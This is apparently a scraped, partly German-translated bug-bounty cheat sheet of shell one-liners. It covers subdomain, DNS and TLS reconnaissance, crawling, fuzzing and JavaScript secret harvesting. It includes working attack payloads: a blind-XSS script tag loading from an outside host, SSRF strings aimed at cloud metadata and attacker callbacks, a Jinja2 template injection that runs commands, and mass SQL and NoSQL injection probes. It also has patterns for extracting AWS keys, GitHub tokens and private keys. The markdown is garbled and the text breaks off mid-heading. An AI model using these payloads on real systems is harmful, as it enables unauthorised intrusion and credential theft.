curl -s "https://urlscan.io/api/v1/search/?q=domain:target.com" | jq -r '.results[].page.domain' 2>/dev/null | sort -u | anew subs.txt

💀 GitHub-Subdomain-Scraping```bash

github-subdomains -d target.com -t YOUR_GITHUB_TOKEN -o github_subs.txt

root@kitploit:~
### 💀 Censys Subdomain-Erkennung```bash
# ☠️ Using Censys API
censys search "target.com" --index-type hosts | jq -r '.[] | .name' | sort -u | anew censys_subs.txt

💀 SecurityTrails API```bash

☠️ SecurityTrails subdomain enumeration

curl -s "https://api.securitytrails.com/v1/domain/target.com/subdomains" -H "APIKEY: YOUR_API_KEY" | jq -r '.subdomains[]' | sed 's/$/.target.com/' | anew subs.txt

root@kitploit:~
### 💀 Wayback Machine Subdomains```bash
# ☠️ Extract subdomains from Wayback Machine
curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e 's/\/.*//g' | sort -u | anew wayback_subs.txt

💀 CommonCrawl Extraktion```bash

☠️ CommonCrawl subdomain extraction

curl -s "https://index.commoncrawl.org/CC-MAIN-2023-50-index?url=*.target.com&output=json" | jq -r '.url' | sed -e 's_https*://__' -e 's//.*//g' | sort -u | anew commoncrawl_subs.txt

root@kitploit:~
### 💀 VirusTotal Subdomains```bash
# ☠️ VirusTotal API
curl -s "https://www.virustotal.com/vtapi/v2/domain/report?apikey=YOUR_API_KEY&domain=target.com" | jq -r '.subdomains[]' 2>/dev/null | anew vt_subs.txt

💀 DNS-Zonenübertragungsversuch```bash

☠️ Check for zone transfer vulnerability

dig axfr @ns1.target.com target.com | grep -E "^[a-zA-Z0-9]" | awk '{print $1}' | sed 's/.$//' | anew zone_transfer.txt

root@kitploit:~
### 💀 Reverse-IP-Suche```bash
# ☠️ Find domains on same IP
host target.com | awk '/has address/ {print $4}' | xargs -I@ sh -c 'curl -s "https://api.hackertarget.com/reverseiplookup/?q=@"' | anew reverse_ip.txt

💀 BGP/ASN-Bereichsscanner```bash

☠️ Get ASN and scan all IP ranges

whois -h whois.radb.net -- '-i origin AS12345' | grep -Eo "([0-9.]+){4}/[0-9]+" | xargs -I@ sh -c 'nmap -sL @ | grep "report for" | cut -d" " -f5' | httpx -silent | anew bgp_hosts.txt

root@kitploit:~
### 💀 PTR Records von IP-Bereich```bash
# ☠️ Mass PTR lookup
prips 192.168.1.0/24 | xargs -P50 -I@ sh -c 'host @ 2>/dev/null | grep "pointer" | cut -d" " -f5' | sed 's/\.$//' | anew ptr_subs.txt

💀 All-in-One Mega-Einzeiler```bash

☠️ THE ULTIMATE SUBDOMAIN HUNTER ☠️

(subfinder -d target.com -all -silent; amass enum -passive -d target.com; assetfinder -subs-only target.com; findomain -t target.com -q; chaos -d target.com -silent; curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/*.//g'; curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" | cut -d',' -f1; curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e 's//.*//g') | sort -u | httpx -silent -threads 100 | anew mega_subs.txt

root@kitploit:~
### 💀 Subdomain Permutation/Bruteforce```bash
# ☠️ Generate permutations and resolve
cat subs.txt | dnsgen - | shuffledns -d target.com -r resolvers.txt -silent | anew permutation_subs.txt

💀 DNS Wordlist Bruteforce mit PureDNS```bash

☠️ Fast bruteforce with PureDNS

puredns bruteforce wordlist.txt target.com -r resolvers.txt -w puredns_subs.txt

root@kitploit:~
### 💀 TLS/SSL Zertifikats-Grabber```bash
# ☠️ Extract subdomains from SSL certificates
echo target.com | httpx -silent | xargs -I@ sh -c 'echo | openssl s_client -connect @:443 2>/dev/null | openssl x509 -noout -text | grep -oP "DNS:[^\s,]+" | sed "s/DNS://"' | sort -u | anew ssl_subs.txt

💀 Favicon-Hash -> Shodan```bash

☠️ Find related hosts via favicon hash

curl -s https://target.com/favicon.ico | md5sum | awk '{print $1}' | xargs -I@ shodan search "http.favicon.hash:@" --fields ip_str,hostnames | anew favicon_hosts.txt

root@kitploit:~
### 💀 Google Dork Subdomain-Entdeckung```bash
# ☠️ Use Google dorks (manual or with tools)
# site:*.target.com -www
# inurl:target.com

🔐 TLS/SSL-Aufklärung (TLSX)

``` ████████╗██╗ ███████╗██╗ ██╗ ██████╗ ███████╗ ██████╗ ██████╗ ███╗ ██╗ ╚══██╔══╝██║ ██╔════╝╚██╗██╔╝ ██╔══██╗██╔════╝██╔════╝██╔═══██╗████╗ ██║ ██║ ██║ ███████╗ ╚███╔╝ ██████╔╝█████╗ ██║ ██║ ██║██╔██╗ ██║ ██║ ██║ ╚════██║ ██╔██╗ ██╔══██╗██╔══╝ ██║ ██║ ██║██║╚██╗██║ ██║ ███████╗███████║██╔╝ ██╗ ██║ ██║███████╗╚██████╗╚██████╔╝██║ ╚████║ ╚═╝ ╚══════╝╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝ ``` **🔐 TLS/SSL-Zertifikatsintelligenz mit TLSX 🔐**

🔐 Einfacher TLS-Zertifikatsscan```bash

🔐 Full TLS certificate details extraction

echo target.com | tlsx -san -cn -so -sv -ss -serial -hash md5 -jarm -ja3 -wc -tps -ve -ce -ct -cdn -silent | tee tlsx_full.txt

root@kitploit:~
### 🔐 Subdomain-Erkennung über SANs```bash
# 🔐 Extract all subdomains from certificate SANs
subfinder -d target.com -silent | tlsx -san -cn -silent -resp-only | grep -oE "[a-zA-Z0-9.-]+\.target\.com" | sort -u | anew san_subdomains.txt

🔐 Jäger für abgelaufene Zertifikate```bash

🔐 Find hosts with expired SSL certificates

cat hosts.txt | tlsx -expired -silent -cn -so | tee expired_certs.txt

root@kitploit:~
### 🔐 Erkennung selbstsignierter Zertifikate```bash
# 🔐 Identify self-signed certificates (potential security issue)
cat hosts.txt | tlsx -self-signed -silent -cn -so -hash sha256 | tee self_signed.txt

🔐 TLS-Versionsaufzählung (Schwaches TLS)```bash

🔐 Find hosts with deprecated TLS versions (TLS 1.0/1.1)

cat hosts.txt | tlsx -tls-version -silent | grep -E "(tls10|tls11)" | tee weak_tls_versions.txt

root@kitploit:~
### 🔐 JARM-Fingerprinting-Pipeline```bash
# 🔐 JARM fingerprint for server identification and correlation
subfinder -d target.com -silent | httpx -silent | tlsx -jarm -silent -json | jq -r '[.host, .jarm_hash] | @tsv' | sort -k2 | anew jarm_fingerprints.txt

🔐 Zertifikatskette & Ausstelleranalyse```bash

🔐 Analyze certificate chain and identify CA

cat hosts.txt | tlsx -so -serial -hash sha256 -ve -ce -json -silent | jq -r '[.host, .issuer_cn, .not_after, .serial] | @tsv' | anew cert_chain_analysis.txt

root@kitploit:~
### 🔐 Massen-TLS-Scan mit Cipher-Aufzählung```bash
# 🔐 Full cipher suite enumeration + TLS version
subfinder -d target.com -silent | httpx -silent | tlsx -cipher -tls-version -silent -json | jq -r '[.host, .version, .cipher] | @tsv' | anew cipher_enum.txt

🔐 Erkennung nicht übereinstimmender Zertifikate```bash

🔐 Find certificates where CN doesn't match the hostname

cat hosts.txt | tlsx -mismatched -cn -san -silent | tee mismatched_certs.txt

root@kitploit:~
### 🔐 Ultimative TLS-Recon-Pipeline```bash
# 🔐 Complete TLS intelligence gathering
subfinder -d target.com -all -silent | httpx -silent -p 443,8443,4443,9443 | tlsx -san -cn -so -sv -ss -serial -expired -self-signed -mismatched -tls-version -jarm -hash sha256 -json -silent | jq -c '{host: .host, cn: .subject_cn, san: .san, issuer: .issuer_cn, expired: .expired, self_signed: .self_signed, tls: .version, jarm: .jarm_hash}' | tee tlsx_full_recon.json

🌐 DNS-Intelligenz (DNSX)

``` ██████╗ ███╗ ██╗███████╗██╗ ██╗ ██████╗ ███████╗ ██████╗ ██████╗ ███╗ ██╗ ██╔══██╗████╗ ██║██╔════╝╚██╗██╔╝ ██╔══██╗██╔════╝██╔════╝██╔═══██╗████╗ ██║ ██║ ██║██╔██╗ ██║███████╗ ╚███╔╝ ██████╔╝█████╗ ██║ ██║ ██║██╔██╗ ██║ ██║ ██║██║╚██╗██║╚════██║ ██╔██╗ ██╔══██╗██╔══╝ ██║ ██║ ██║██║╚██╗██║ ██████╔╝██║ ╚████║███████║██╔╝ ██╗ ██║ ██║███████╗╚██████╗╚██████╔╝██║ ╚████║ ╚═════╝ ╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝ ``` **🌐 DNS-Aufklärung & Informationssammlung mit DNSX 🌐**

🌐 1. Massen-DNS-Auflösung + Wildcard-Filterung```bash

🌐 Resolve subdomains and filter out wildcards

subfinder -d target.com -silent | dnsx -silent -a -resp-only -wd target.com | sort -u | anew resolved_ips.txt

root@kitploit:~
### 🌐 2. DNS-Enumeration mit mehreren Record-Typen```bash
# 🌐 Query A, AAAA, CNAME, MX, NS, TXT records simultaneously
echo target.com | dnsx -silent -a -aaaa -cname -mx -ns -txt -resp | tee full_dns_records.txt

🌐 3. CNAME-Extraktion für Subdomain-Übernahme```bash

🌐 Find dangling CNAMEs pointing to vulnerable services

subfinder -d target.com -silent | dnsx -silent -cname -resp-only | grep -iE "(s3|cloudfront|herokuapp|github|azure|shopify|fastly|pantheon|zendesk|readme|ghost|surge|bitbucket|wordpress|tumblr)" | anew cname_takeover_candidates.txt

root@kitploit:~
### 🌐 4. Reverse DNS (PTR) auf IP-Bereichen```bash
# 🌐 Discover hidden hosts via reverse DNS lookups
prips 192.168.1.0/24 | dnsx -silent -ptr -resp-only | anew ptr_discovered_hosts.txt

🌐 5. MX Records für die E-Mail-Sicherheitsanalyse```bash

🌐 Extract MX records to identify mail servers and SPF bypass opportunities

cat domains.txt | dnsx -silent -mx -resp | awk '{print $1, $2}' | sort -u | tee mx_records.txt && cat domains.txt | dnsx -silent -txt -resp | grep -i "spf" | anew spf_records.txt

root@kitploit:~
### 🌐 6. NS-Einträge + DNS-Zonentransfer-Prüfung```bash
# 🌐 Enumerate nameservers and check for misconfigured zone transfers
cat domains.txt | dnsx -silent -ns -resp-only | tee nameservers.txt && cat nameservers.txt | xargs -I@ -P10 sh -c 'host -t axfr target.com @ 2>&1 | grep -v "failed\|timed out" && echo "[ZONE TRANSFER] @"' | anew zone_transfers.txt

🌐 7. DNS Brute-force mit benutzerdefinierten Resolvern```bash

🌐 Mass DNS brute-force with custom resolver list

cat wordlist.txt | sed 's/$/.target.com/' | dnsx -silent -r resolvers.txt -rl 500 -t 200 -retry 3 -resp-only | anew bruteforced_subs.txt

root@kitploit:~
### 🌐 8. JSON-Ausgabe für erweitertes Parsen```bash
# 🌐 Full DNS recon with JSON output for pipeline integration
subfinder -d target.com -silent | dnsx -silent -a -aaaa -cname -mx -ns -txt -ptr -resp -json | jq -c '{host: .host, a: .a, aaaa: .aaaa, cname: .cname, mx: .mx, ns: .ns, txt: .txt}' | tee dns_full_recon.json

🌐 9. ASN-Erkennung über DNS + IP-Korrelation```bash

🌐 Resolve domains, extract unique IPs, and identify ASN ownership

subfinder -d target.com -silent | dnsx -silent -a -resp-only | sort -u | tee target_ips.txt | xargs -I{} sh -c 'whois {} 2>/dev/null | grep -iE "(netname|orgname|asn|origin)" | head -5' | anew asn_info.txt

root@kitploit:~
### 🌐 10. Ultimative DNS-Aufklärungs-Pipeline```bash
# 🌐 Complete DNS intelligence gathering
domain="target.com"; subfinder -d $domain -all -silent | tee subs_$domain.txt | dnsx -silent -a -aaaa -cname -mx -ns -txt -resp -json -o dns_records_$domain.json; cat subs_$domain.txt | dnsx -silent -cname -resp-only | grep -iE "(s3|cloudfront|azure|github)" | anew takeover_$domain.txt; cat dns_records_$domain.json | jq -r '.a[]?' | sort -u | dnsx -silent -ptr -resp-only | anew ptr_$domain.txt; echo "[+] DNS Recon Complete: $(wc -l < subs_$domain.txt) subdomains | $(cat dns_records_$domain.json | wc -l) records"

🎯 Profi-Tipp: Verwende benutzerdefinierte Resolver für bessere Leistung: dnsx -r resolvers.txt -rl 1000


📜 JavaScript Aufklärung

Vollständige JS-Pipeline```bash

subfinder -d target.com -silent | httpx -silent | katana -d 5 -jc -silent | grep -iE '.js$' | anew js.txt

root@kitploit:~
### Geheimnisse aus JS extrahieren```bash
cat js.txt | httpx -silent -sr -srd js_files/ && nuclei -t exposures/ -target js.txt

LinkFinder auf JS-Dateien```bash

cat js.txt | xargs -I@ -P10 bash -c 'python3 linkfinder.py -i @ -o cli 2>/dev/null' | anew endpoints.txt

root@kitploit:~
### SecretFinder Massen-Scan```bash
cat js.txt | xargs -I@ -P5 python3 SecretFinder.py -i @ -o cli | anew secrets.txt

JS-Variablen-Extraktion```bash

cat file.js | grep -oE "var\s+\w+\s*=\s*['"][^'"]+['"]" | sort -u

root@kitploit:~
### API-Schlüssel aus JS```bash
cat js.txt | nuclei -t http/exposures/tokens/ -silent | anew api_keys.txt

Alle URLs aus JS extrahieren```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "(https?://[^"'`\s<>]+)" | sort -u | anew js_urls.txt

root@kitploit:~
### API-Endpunkte in JS finden```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "(/api/[^\"\'\`\s\<\>]+|/v[0-9]+/[^\"\'\`\s\<\>]+)" | sort -u

Extrahiere fest codierte Anmeldeinformationen```bash

cat js.txt | xargs -I@ curl -s @ | grep -iE "(password|passwd|pwd|secret|api_key|apikey|token|auth)" | sort -u

root@kitploit:~
### AWS-Schlüssel aus JS extrahieren```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "(AKIA[0-9A-Z]{16}|ABIA[0-9A-Z]{16}|ACCA[0-9A-Z]{16}|ASIA[0-9A-Z]{16})" | sort -u | anew aws_keys.txt

Extrahiere Google-API-Schlüssel aus JS```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "AIza[0-9A-Za-z-_]{35}" | sort -u | anew google_api_keys.txt

root@kitploit:~
### Firebase-URLs aus JS extrahieren```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "https://[a-zA-Z0-9-]+\.firebaseio\.com|https://[a-zA-Z0-9-]+\.firebase\.com" | sort -u | anew firebase_urls.txt

S3-Buckets aus JS extrahieren```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "[a-zA-Z0-9.-]+.s3.amazonaws.com|s3://[a-zA-Z0-9.-]+|s3-[a-zA-Z0-9-]+.amazonaws.com/[a-zA-Z0-9.-]+" | sort -u | anew s3_from_js.txt

root@kitploit:~
### Interne IPs aus JS extrahieren```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "(10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.(1[6-9]|2[0-9]|3[0-1])\.[0-9]{1,3}\.[0-9]{1,3}|192\.168\.[0-9]{1,3}\.[0-9]{1,3})" | sort -u | anew internal_ips.txt

Slack Webhooks aus JS extrahieren```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "https://hooks\.slack\.com/services/T[a-zA-Z0-9_]+/B[a-zA-Z0-9_]+/[a-zA-Z0-9_]+" | sort -u | anew slack_webhooks.txt

root@kitploit:~
### Extrahieren von GitHub-Tokens aus JS```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "(ghp_[a-zA-Z0-9]{36}|gho_[a-zA-Z0-9]{36}|ghu_[a-zA-Z0-9]{36}|ghs_[a-zA-Z0-9]{36}|ghr_[a-zA-Z0-9]{36}|github_pat_[a-zA-Z0-9]{22}_[a-zA-Z0-9]{59})" | sort -u | anew github_tokens.txt

Private Keys aus JS extrahieren```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "-----BEGIN (RSA |EC |DSA |OPENSSH |PGP )?PRIVATE KEY( BLOCK)?-----" | sort -u | anew private_keys_found.txt

root@kitploit:~
### E-Mail-Adressen aus JS extrahieren```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sort -u | anew emails_from_js.txt

Extrahiere verborgene Subdomains aus JS```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "https?://[a-zA-Z0-9.-]+.[a-zA-Z]{2,}" | sed 's|https?://||' | cut -d'/' -f1 | sort -u | anew subdomains_from_js.txt

root@kitploit:~
### 💀 GraphQL Endpoints aus JS extrahieren```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "(graphql|gql|query|mutation)[^\"']*" | grep -oE "/[a-zA-Z0-9/_-]*graphql[a-zA-Z0-9/_-]*" | sort -u | anew graphql_endpoints.txt

💀 JWT Tokens aus JS Files extrahieren```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "eyJ[A-Za-z0-9_-].eyJ[A-Za-z0-9_-].[A-Za-z0-9_-]*" | sort -u | anew jwt_tokens.txt

root@kitploit:~
### 💀 Finde Webpack Source Maps```bash
cat js.txt | sed 's/\.js$/.js.map/' | httpx -silent -mc 200 -ct -match-string "sourcesContent" | anew sourcemaps.txt

💀 Discord Webhooks aus JS extrahieren```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "https://discord\.com/api/webhooks/[0-9]+/[A-Za-z0-9_-]+" | sort -u | anew discord_webhooks.txt

root@kitploit:~
### 💀 Versteckte Admin-Routen in JS finden```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "[\"\'][/][a-zA-Z0-9_/-]*(admin|dashboard|manage|config|settings|internal|private|debug|api/v[0-9])[a-zA-Z0-9_/-]*[\"\']" | tr -d "\"'" | sort -u | anew hidden_routes.txt

💉 XSS-Erkennung

Dalfox Pipeline```bash

cat urls.txt | gf xss | uro | qsreplace '">' | dalfox pipe --silence --skip-bav

root@kitploit:~
### Blind XSS with Callback```bash
cat urls.txt | gf xss | qsreplace '"><script src=https://xss.report/c/YOURID></script>' | httpx -silent

Airixss Schnellscan```bash

echo target.com | waybackurls | gf xss | uro | httpx -silent | qsreplace '">' | airixss -payload "confirm(1)"

root@kitploit:~
### Knoxss API```bash
cat urls.txt | gf xss | uro | xargs -I@ curl -s "https://knoxss.me/api/v3" -d "target=@" -H "X-API-KEY: YOUR_KEY"

DOM XSS Erkennung```bash

cat js.txt | xargs -I@ bash -c 'curl -s @ | grep -E "(document.(location|URL|cookie|domain|referrer)|innerHTML|outerHTML|eval(|.write()" && echo "--- @ ---"'

root@kitploit:~
### Mass XSS mit Nuclei DAST```bash
cat urls.txt | httpx -silent | nuclei -dast -t dast/vulnerabilities/xss/ -rl 50

Erkennung reflektierter Parameter```bash

cat urls.txt | kxss 2>/dev/null | grep -v "Not Reflected" | anew reflected_params.txt

root@kitploit:~
### XSS Polyglot Tests```bash
cat urls.txt | gf xss | qsreplace "jaVasCript:/*-/*`/*\`/*'/*\"/**/(/* */oNcLiCk=alert() )//" | httpx -silent -mr "alert"

🗄️ SQL-Injection

SQLMap Mass Scan```bash

cat urls.txt | gf sqli | uro | anew sqli.txt && sqlmap -m sqli.txt --batch --random-agent --level 2 --risk 2

root@kitploit:~
### Fehlerbasierte Erkennung```bash
cat urls.txt | gf sqli | qsreplace "'" | httpx -silent -ms "error|sql|syntax|mysql|postgresql|oracle" | anew sqli_errors.txt

Zeitbasierte Blind```bash

cat urls.txt | gf sqli | qsreplace "1' AND SLEEP(5)-- -" | httpx -silent -timeout 10 | anew time_based.txt

root@kitploit:~
### Ghauri Scan```bash
cat sqli.txt | xargs -I@ ghauri -u @ --batch --level 3

UNION-Erkennung```bash

cat urls.txt | gf sqli | qsreplace "1 UNION SELECT NULL,NULL,NULL-- -" | httpx -silent -mc 200

root@kitploit:~
### Boolesche Erkennung```bash
cat urls.txt | gf sqli | qsreplace "1' AND '1'='1" | httpx -silent -mc 200 | anew boolean_sqli.txt

NoSQL Injection```bash

cat urls.txt | qsreplace '{"$gt":""}' | httpx -silent -mc 200 | anew nosqli.txt cat urls.txt | qsreplace "admin'||'1'=='1" | httpx -silent | anew nosqli.txt

root@kitploit:~
---

## 🌐 SSRF & SSTI

### SSRF mit Interactsh```bash
cat urls.txt | gf ssrf | qsreplace "https://YOURBURP.oastify.com" | httpx -silent

SSRF-Parameter-Fuzzing```bash

cat urls.txt | qsreplace "http://169.254.169.254/latest/meta-data/" | httpx -silent -match-string "ami-id"

root@kitploit:~
### SSTI Erkennung```bash
cat urls.txt | gf ssti | qsreplace "{{7*7}}" | httpx -silent -match-string "49" | anew ssti_vuln.txt

SSTI Payload Test```bash

cat urls.txt | qsreplace '${77}' | httpx -silent -mr "49" && cat urls.txt | qsreplace '<%= 77 %>' | httpx -silent -mr "49"

root@kitploit:~
### Vollständige SSRF-Kette```bash
cat params.txt | grep -iE "(url|uri|path|src|dest|redirect|redir|return|next|target|out|view|page|show|fetch|load)" | qsreplace "http://YOURSERVER" | httpx -silent

SSRF mit DNS Rebinding```bash

cat urls.txt | gf ssrf | qsreplace "http://7f000001.burpcollaborator.net" | httpx -silent

root@kitploit:~
### Jinja2 SSTI```bash
cat urls.txt | qsreplace "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}" | httpx -silent

🕷️ Web-Crawling

Katana Deep Crawl```bash

katana -u https://target.com -d 10 -jc -kf all -aff -silent | anew crawl.txt

root@kitploit:~
### Gospider Vollständiger Crawl```bash
gospider -s https://target.com -c 20 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico)" | anew

Hakrawler mit Bereich```bash

echo https://target.com | hakrawler -d 5 -subs -u | anew hakrawler.txt

root@kitploit:~
### ParamSpider Erkennung```bash
paramspider -d target.com --exclude woff,css,js,png,svg,jpg -o params.txt

Waymore Historische URLs```bash

waymore -i target.com -mode U -oU urls.txt

root@kitploit:~
### Crawlen mit Headless-Browser```bash
katana -u https://target.com -headless -d 5 -jc -silent | anew headless_crawl.txt

Formulare extrahieren```bash

katana -u https://target.com -f qurl -silent | grep "?" | anew forms.txt

root@kitploit:~
### 💀 Katana Multi-Ziel Deep Crawl + JS-Parsing```bash
# ☠️ Crawl multiple targets with JavaScript parsing and form extraction
cat alive.txt | katana -d 8 -jc -kf all -aff -ef woff,css,png,svg,jpg,woff2,jpeg,gif,ico -c 50 -p 20 -silent -o katana_multi.txt

💀 Gospider Rekursiv + Sitemap + Robots```bash

☠️ Full crawl with sitemap parsing and robots.txt extraction

gospider -S alive.txt -c 30 -d 5 -t 20 --sitemap --robots --js -a -w --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|svg)" -o gospider_output && cat gospider_output/* | grep -oE 'https?://[^"]+' | sort -u | anew gospider_urls.txt

root@kitploit:~
### 💀 Hakrawler + Wayback + GAU Kombinierter Crawler```bash
# ☠️ Triple source crawling: live + wayback + gau
echo target.com | hakrawler -d 5 -subs -u > hakrawler.txt && waybackurls target.com > wayback.txt && gau target.com > gau.txt && cat hakrawler.txt wayback.txt gau.txt | sort -u | httpx -silent | anew all_crawled.txt

💀 Katana Headless + Formular-Autofill + Screenshot```bash

☠️ Headless browser crawl with form interaction and XHR capture

katana -u https://target.com -headless -d 6 -jc -aff -xhr -form -timeout 15 -silent -nc -c 20 | anew headless_interactive.txt

root@kitploit:~
### 💀 Cariddi Vollständiger Crawl mit Erkennung von Geheimnissen```bash
# ☠️ Crawl with built-in secrets/endpoints/parameters extraction
cariddi -u https://target.com -d 5 -s -e -ext 1 -plain -t 50 -c 20 | tee cariddi_results.txt && grep -E "(api|secret|key|token|pass|auth)" cariddi_results.txt | anew secrets_found.txt

💀 Parallel Domain Crawler Pipeline```bash

☠️ Mass parallel crawling with deduplication

cat domains.txt | parallel -j 10 "katana -u https://{} -d 5 -jc -silent" | uro | anew parallel_crawl.txt

root@kitploit:~
### 💀 Katana + Gospider + LinkFinder Chain```bash
# ☠️ Combined crawling + JS endpoint extraction pipeline
katana -u https://target.com -d 5 -jc -silent | grep "\.js$" | httpx -silent | xargs -I@ bash -c 'curl -s @ | grep -oE "(\/[a-zA-Z0-9_\-\/]+)" | sort -u' | anew js_endpoints.txt && gospider -s https://target.com -d 5 -c 10 --js -q | grep -oE 'https?://[^"]+' | anew combined_crawl.txt

💀 Rekursiver Crawl + Nuclei Auto-Scan-Pipeline```bash

☠️ Crawl then auto-scan discovered endpoints for vulnerabilities

katana -u https://target.com -d 6 -jc -kf all -aff -silent | tee crawl_output.txt | grep -E ".(php|asp|aspx|jsp|do|action)(?|$)" | nuclei -t /root/nuclei-templates/ -severity high,critical -silent -o crawl_vulns.txt

root@kitploit:~
### 💀 Waymore + Katana Historical + Live Merge```bash
# ☠️ Merge historical URLs with live crawl for maximum coverage
waymore -i target.com -mode U -oU waymore_urls.txt && katana -u https://target.com -d 5 -jc -aff -silent -o katana_live.txt && cat waymore_urls.txt katana_live.txt | uro | httpx -silent -mc 200,301,302,403 | anew merged_crawl.txt

💀 Multi-Crawler Ausgabe-Deduplizierung + Parameterextraktion```bash

☠️ Run all crawlers and extract unique parameters

(gospider -s https://target.com -d 3 -c 10 -q; hakrawler -url https://target.com -d 3; katana -u https://target.com -d 3 -jc -silent) | sort -u | unfurl -u keys | sort | uniq -c | sort -rn | head -100 | anew top_params.txt

root@kitploit:~
## 🔑 Parametererkennung

### X8 Versteckte Parameter```bash
cat urls.txt | httpx -silent | xargs -I@ x8 -u @ -w params.txt

Arjun Discovery```bash

arjun -i urls.txt -oT arjun_params.txt --stable

root@kitploit:~
### Benutzerdefinierte Parameter-Brute-Force```bash
cat urls.txt | sed 's/$/\?FUZZ=test/' | ffuf -w params.txt:FUZZ -u FUZZ -mc 200,301,302 -ac

Parameter aus JS extrahieren```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "[?&][a-zA-Z0-9_]+=" | cut -d'=' -f1 | tr -d '?&' | sort -u

root@kitploit:~
### Parameter-Pollution-Test```bash
cat urls.txt | qsreplace 'param=value1&param=value2' | httpx -silent -mc 200

📁 Inhaltserkennung

Ffuf Verzeichnis-Bruteforce```bash

ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302,403 -ac -c -t 100

root@kitploit:~
### 💀 Rekursives Fuzzing - ffuf Tiefenscan```bash
# ☠️ Recursive directory bruteforce with depth 3
ffuf -u https://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 3 -mc 200,301,302,403 -ac -c -t 100 -o ffuf_recursive.json -of json

💀 Feroxbuster Vollständiger rekursiver Scan```bash

☠️ Deep recursive scan with auto-tune and smart filtering

feroxbuster -u https://target.com -w wordlist.txt -d 5 -L 4 --auto-tune -C 404,500 --smart -o ferox_results.txt

root@kitploit:~
### 💀 Feroxbuster Multi-Target Recursive```bash
# ☠️ Scan multiple targets from file with recursion
cat alive.txt | xargs -I@ feroxbuster -u @ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -d 3 -t 50 --no-state -q -o [email protected]

💀 ffuf + Feroxbuster Pipeline (Erweiterungen + Rekursion)```bash

☠️ Find directories with ffuf, then deep scan each with feroxbuster

ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302 -ac -c -t 100 -o dirs.json -of json && cat dirs.json | jq -r '.results[].url' | xargs -I@ feroxbuster -u @ -w wordlist.txt -x php,asp,aspx,jsp,html,js -d 2 -t 30 -q

root@kitploit:~
### 💀 Rekursives Fuzzing mit Massenscan von Erweiterungen```bash
# ☠️ ffuf recursive with multiple extensions + backup files
ffuf -u https://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 2 -e .php,.asp,.aspx,.jsp,.html,.js,.json,.xml,.bak,.old,.txt,.conf,.config,.zip,.tar.gz -mc 200,301,302,403,500 -ac -t 80 -rate 100 -o recursive_ext.json

💀 Feroxbuster Paralleler Rekursiver Scan```bash

☠️ Parallel scan with multiple wordlists and extensions

feroxbuster -u https://target.com -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,asp,aspx,jsp,bak,old,zip -d 4 -t 100 -L 5 --parallel 10 --dont-extract-links -C 404 -o ferox_parallel.txt

root@kitploit:~
### 💀 Feroxbuster Stille rekursive + Header```bash
# ☠️ Stealth recursive scan with custom headers and rate limiting
feroxbuster -u https://target.com -w wordlist.txt -d 3 -t 30 -r -k --random-agent -H "X-Forwarded-For: 127.0.0.1" -H "X-Custom-IP-Authorization: 127.0.0.1" --rate-limit 50 -C 400,401,403,404,500 -q -o ferox_stealth.txt

💀 Feroxbuster Extrahiere Links + Rekursiv```bash

☠️ Extract links from responses and add to scan queue recursively

feroxbuster -u https://target.com -w wordlist.txt -d 5 --extract-links --collect-words --collect-backups -x php,html,js,json -t 50 -o ferox_extracted.txt

root@kitploit:~
### 💀 Feroxbuster Fortsetzung + Filter nach Größe```bash
# ☠️ Smart filtering by response size and resumable state
feroxbuster -u https://target.com -w wordlist.txt -d 4 -S 0 -W 1 --filter-status 404,500 --filter-words 20 --filter-lines 5 --resume-from ferox_state.json --state-file ferox_state.json -o ferox_filtered.txt

💀 Feroxbuster API-Endpunkte-Erkennung```bash

☠️ Recursive API fuzzing with JSON content-type

feroxbuster -u https://target.com/api -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -d 3 -x json -t 50 -H "Accept: application/json" -H "Content-Type: application/json" --dont-extract-links -m GET,POST -o ferox_api.txt

root@kitploit:~
### Git-Exposition```bash
cat urls.txt | httpx -silent -path /.git/config -mc 200 -ms "[core]" | anew git_exposed.txt

Sensitive Dateien```bash

cat urls.txt | httpx -silent -path /.env,/config.php,/wp-config.php.bak,/.htaccess,/server-status -mc 200 | anew sensitive.txt

root@kitploit:~
### Backup-Dateien```bash
cat urls.txt | sed 's/$/.bak/' | httpx -silent -mc 200 && cat urls.txt | sed 's/$/.old/' | httpx -silent -mc 200

API-Dokumentation```bash

